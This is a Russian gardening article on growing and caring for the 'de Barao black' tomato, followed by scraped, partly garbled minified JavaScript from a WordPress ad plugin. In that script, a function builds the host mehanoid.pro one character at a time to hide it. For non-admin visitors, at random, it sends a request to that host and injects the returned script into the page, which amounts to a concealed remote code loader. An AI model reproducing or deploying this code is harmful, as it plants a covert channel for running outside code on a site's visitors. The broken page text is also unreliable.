Грядка удобряется перегноем, золой и вскапывается. Делаются небольшие лунки с расчета 4 пагона на метр квадратный. В лунки вливается вода (желательно отстоянная), и сажается куст, который лучше сразу подвязать.

Уход за помидорами

На этом этапе помидоры нуждаются в регулярном поливе (раз в неделю). Поливать нужно аккуратно под корень или использовать капельный полив. При этом нужно учитывать, что чрезмерное увлажнение приводит к различным заболеваниям кустов.

После появления первых плодов нужно приступать к пасынкованию – удалению пасынков. Остаются один или два основных стебля. Когда томат разрастется, появится большое количество кистей, проводится прищипывание – удаляются лишние соцветия. Не нужно забывать отрывать нижние листья – так можно избежать развитие многих болезней.

Томаты хорошо отзываются на подкормки. Самые распространенные – фосфорные и калийные. Их можно проводить 2-3 раза за сезон. Когда начинается период цветения, проводится обработка раствором борной кислоты.

Борьба с вредителями и болезнями

К большинству болезней у помидоров сорта де Барао есть иммунитет. Но несколько заболеваний могут поставить под риск будущий урожай:

  • Черная бактериальная пятнистость, в борьбе используется Фитолавин;
  • Вершинная гниль. Применяется раствор кальциевой селитры.

Из вредителей опасными могут быть колорадские жуки (Антижук, Престиж), слизни (раствор горчицы).

Достоинства и недостатки

Свою хорошую репутацию томат де Барао черный заслужил положительными качествами:

  • Необыкновенная окраска;
  • Насыщенный томатный вкус;
  • Универсальное применение;
  • Стойкость к заболеваниям;
  • Хорошая лежкость и приспособленность к перевозкам;
  • Высокая урожайность;
  • Неприхотливость к месту выращивания.

Несмотря на такое количество плюсов, нужно учитывать и некоторые минусы данного сорта:

  • Высокий рост;
  • Тщательный уход:
  • Позднее дозревание;
  • Плохая уживчивость с другими сортами.

Процесс выращивания томатов де Барао черный не самый легкий. Он требует терпения, внимательности, трудолюбия и некоторых знаний. Но результат стоит тех усилий. Экзотические плоды порадуют своим ярким вкусом и необычным цветом.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};